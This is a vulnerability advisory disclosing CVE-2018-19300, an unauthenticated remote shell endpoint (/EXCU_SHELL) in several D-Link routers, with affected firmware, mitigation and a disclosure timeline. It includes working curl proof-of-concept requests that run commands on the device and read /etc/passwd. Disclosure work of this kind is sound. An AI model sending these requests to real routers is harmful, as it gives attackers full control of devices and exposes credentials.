CVE-2018-19300: Remote Command Execution Vulnerability in D-Link DWR and DAP Routers

advisory

#1

Overview

In early November, 2018, while analyzing D-Link DWR devices, we discovered a vulnerability in DWR-711 and DAP-1530 Routers. This vulnerability would allow an unauthenticated attacker to perform shell commands with full administrative privileges on the vulnerable device.

Vulnerability Details

  • Affected are according to D-Link following devices and firmware versions:
    • DAP-1530 (All A revisions) before firmware version 1.06b01
    • DAP-1610 (All A revisions) before firmware version 1.06b01
    • DWR-111 (All A revisions) before firmware version 1.02v02
    • DWR-116 (All A revisions) before firmware version 1.06b03
    • DWR-512 (All B revisions) before firmware version 2.02b01
    • DWR-711 (All A revisions) through firmware version 1.11
    • DWR-712 (All B revisions) before firmware version 2.04b01
    • DWR-921 (All A revisions) before firmware version 1.02b01
    • DWR-921 (All B revisions) before firmware version 2.03b01
  • The vulnerability exists within the /EXCU_SHELL URI, to exploit it an attacker would have to send a GET request to it with the following headers
    • cmdnum: 1 (This specifies the number of commands to execute, but 1 is sufficient for this)
    • command1: [command] (This is the command to be executed)
    • confirm1: n (This specifies that the command should be executed without prior confirmation)
  • A curl command would look like this:
    • curl '[IP]/EXCU_SHELL' -H 'cmdnum: 1' -H 'command1: ls -l /' -H 'confirm1: n'
  • The shell supports all basic bash commands and more, and delivers the output in a HTTP response. The /EXCU_SHELL redirects all input straight to the /bin/bash shell.
  • Example:
    • curl 'http://[IP]:[Port]/EXCU_SHELL' -H 'cmdnum: 1' -H 'command1: cat /etc/passwd' -H 'confirm1: n' --compressed

      admin:[Password]:0:0:Adminstrator:/:/bin/sh


The vulnerability seems to be by design, as the /EXCU_SHELL is used for tasks such as retrieving hardware and firmware version information. An active check for this vulnerability can be found in the Greenbone Security Feed, using the OID 1.3.6.1.4.1.25623.1.0.113294.

Mitigation

The vendor has started to release firmware updates for all affected devices. Please see the vendor advisory linked in the references for more information.

References

Disclosure Timeline

  • 2018/11/13: Informed D-Link USA Incident Response Team about the vulnerability. (Further informed D-Link IR Team that the vulnerability will be disclosed if no advisory or fix is released within 90 days)
  • 2018/11/14: Response from D-Link IR Team, asking for specifics about model number and firmware version
  • 2018/11/14: Provided D-Link IR Team with the requested information
  • 2018/11/14: Answer from D-Link IR Team, detailing their plan to go about the disclosure, asking the 3rd party (us) to request a CVE ID
  • 2018/11/15: Requested a CVE ID
  • 2018/11/15: Got assigned CVE-2018-19300
  • 2018/11/16: Informed D-Link IR Team about the CVE ID and asked for a status update within 90 days or once a fix has been developed
  • 2018/11/21: Mail from D-Link Germany, asking for more details and a PoC
  • 2018/11/21: Answered with further details and a PoC in the form of a specific curl request
  • 2019/02/11: End of 90-day deadline
  • 2019/02/19: Contacted D-Link Germany to ask about their progress and to inform about the deadline having been exceeded by a week
  • 2019/02/19: Answer from D-Link Germany that they will inform us as soon as possible
  • 2019/02/26: Informed D-Link that a disclosure is planned for the upcoming week
  • 2019/03/01: Answer from D-Link with information about affected models and fixed firmware versions
  • 2019/03/17: Disclosure of the vulnerability in accordance to our Responsible Disclosure guidelines as no fix or notification of the vendor was provided to the end user and the deadline was already exceeded by one 36 days